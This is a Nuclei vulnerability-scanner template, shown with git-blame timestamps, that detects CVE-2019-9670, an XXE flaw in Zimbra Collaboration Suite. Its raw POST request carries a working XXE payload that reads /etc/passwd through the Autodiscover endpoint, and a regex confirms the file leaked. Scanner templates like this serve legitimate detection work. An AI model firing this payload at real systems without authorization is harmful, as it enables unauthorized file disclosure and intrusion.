nuclei-templates/cves/2019/CVE-2019-9670.yaml

33 lines
1003 B
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-9670
2020-10-29 10:53:46 +00:00
info:
name: Zimbra Collaboration XXE
description: Mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML External Entity injection (XXE) vulnerability.
2020-10-29 10:53:46 +00:00
author: ree4pwn
severity: critical
tags: cve,cve2019,zimbra,xxe
2020-10-29 10:53:46 +00:00
requests:
- raw:
- |
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/xml
<!DOCTYPE xxe [
<!ELEMENT name ANY >
2020-10-30 05:31:43 +00:00
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
2020-10-29 10:53:46 +00:00
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>
matchers:
- type: regex
regex:
- 'root:[x*]:0:0'
part: body